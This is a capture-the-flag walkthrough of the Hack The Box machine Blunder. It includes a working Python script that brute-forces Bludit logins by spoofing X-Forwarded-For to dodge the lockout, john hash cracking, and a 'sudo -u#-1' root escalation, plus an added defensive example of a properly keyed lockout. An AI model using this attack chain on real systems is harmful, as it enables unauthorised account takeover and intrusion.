This is a Linux machine rated easy; in fact it is only easy once I had the correct parameters to exploit the CVEs.
NMAP
Unlike other Linux HTB machines, this machine does not have SSH; only the HTTP service is open.
nmap -sV -sC -vvv -oN blunder 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up, received syn-ack (0.18s latency).
Scanned at 2020-06-01 15:58:17 +08 for 29s
Not shown: 998 filtered ports
Reason: 998 no-responses
PORT   STATE  SERVICE REASON       VERSION
21/tcp closed ftp     conn-refused
80/tcp open   http    syn-ack      Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  1 15:58:46 2020 -- 1 IP address (1 host up) scanned in 30.34 seconds
Looking at the web
This is a static page and there is not much interesting at first glance.
Doing web enumeration with gobuster, I found that there is a todo.txt.
gobuster dir -u http://10.10.10.191 -x .php,.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o ~/htb/blunder/go3 --timeout 60s -t 30
Apart from this text file, there is an admin directory which is a login page.
From the todo.txt, a username – fergus – is found.
The password is within the main page; for this I used cewl -d 2 -m 5 -w dict.txt http://10.10.10.191/ to help me generate a wordlist.
Bludit has a lockout feature which “prevents” bruteforcing; from the web I found a Python script which can be used to bypass the bruteforce protection.
Finding fergus password for bludit
This is the modified Python code which is used for Blunder.

#!/usr/bin/env python3
# https://rastating.github.io/bludit-brute-force-mitigation-bypass/
import re
import requests

filepath = "/home/cyruslab/htb/blunder/dict.txt"
host = 'http://10.10.10.191'
login_url = host + '/admin/'
username = 'fergus'

with open(filepath, "r") as f:
    wordlist = f.read().split("\n")

for password in wordlist:
    if not password:
        # split() leaves an empty string for the trailing newline; skip it
        continue

    # a fresh session per attempt so each request fetches a new CSRF token
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p=password))

    # Bludit keys its lockout counter on X-Forwarded-For, so a new value per
    # attempt makes every request look like it comes from a different client
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)

    # a successful login redirects to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u=username, p=password))
            print()
            break
Running the script found a password match for fergus.
SUCCESS: Password found! Use fergus:RolandDeschain to login.
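To make clear why the script above works, here is an added example (not from the original post or from Bludit itself) that models a login throttle keyed on the client-supplied X-Forwarded-For header next to a hardened one keyed on the real peer address. The class names, the attempt limit and the sample addresses are constructed for illustration.

```python
# Added example, not Bludit's own code: a login lockout that trusts
# X-Forwarded-For blindly, beside a hardened version keyed on the TCP peer.
from collections import defaultdict

MAX_ATTEMPTS = 5  # constructed limit; Bludit's real threshold is not on the page


class XffKeyedLockout:
    """Weak: identifies the client by whatever X-Forwarded-For says."""

    def __init__(self):
        self.failures = defaultdict(int)

    def client_key(self, peer_ip, headers):
        return headers.get("X-Forwarded-For", peer_ip)

    def attempt(self, peer_ip, headers, password_ok):
        key = self.client_key(peer_ip, headers)
        if self.failures[key] >= MAX_ATTEMPTS:
            return "locked"
        if password_ok:
            self.failures.pop(key, None)
            return "success"
        self.failures[key] += 1
        return "denied"


class PeerKeyedLockout(XffKeyedLockout):
    """Hardened: key on the peer; honour X-Forwarded-For only from a trusted proxy."""

    def __init__(self, trusted_proxies=()):
        super().__init__()
        self.trusted_proxies = set(trusted_proxies)

    def client_key(self, peer_ip, headers):
        xff = headers.get("X-Forwarded-For")
        if peer_ip in self.trusted_proxies and xff:
            # the rightmost hop is the address the trusted proxy actually saw
            return xff.split(",")[-1].strip()
        return peer_ip


def simulate(lockout, client_ip, guesses):
    """One wrong guess per request, each with a fresh X-Forwarded-For value,
    the same pattern the bypass script uses. Returns the outcome per request."""
    results = []
    for guess in guesses:
        headers = {"X-Forwarded-For": guess}
        results.append(lockout.attempt(client_ip, headers, password_ok=False))
    return results
```

With the weak lockout every guess lands on a fresh counter and is never locked, while the peer-keyed lockout blocks the same client after MAX_ATTEMPTS failures.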
Exploit bludit
With the username and password, I am using metasploit’s module to exploit the Bludit version 3.9.2 vulnerability.
The version of bludit was revealed when enumerating and testing with burpsuite.
By using searchsploit the exploit can be located.
The module to exploit bludit 3.9.2 is also available in my metasploit version.
After setting the username, the password and Bludit’s IP address, the exploit is executed successfully:
Get the user flag
First of all I am upgrading the shell to /bin/bash.
There are two users’ home directories: the user flag exists in hugo’s directory, hence the first step is to find hugo’s password.
Searching the server I found the password hash of hugo in users.php under the directory /var/www/bludit-3.10.0a/bl-content/databases.
With john the hash was cracked and the password of hugo was found to be Password120.
$john -rules --wordlist=/usr/share/wordlists/rockyou.txt hugo.hash
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
Password120      (?)
1g 0:00:00:02 DONE (2020-06-02 18:46) 0.3745g/s 6238Kp/s 6238Kc/s 6238KC/s Password125..Password1122
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
Change user to hugo and the user flag is obtained.
Privilege escalation to root
Hugo’s sudo privilege:
This configuration has a vulnerability which can be exploited. By running /bin/bash as sudo user #-1, root is obtained.
sudo -u#-1 /bin/bash -i
Other discovery
There are two screenshots found in shaun’s home folder.
sudo -u shaun /bin/bash -i
Now assumed as shaun.
One of the two screenshots looked interesting, but it is a rabbit hole, because the root.txt is always randomized.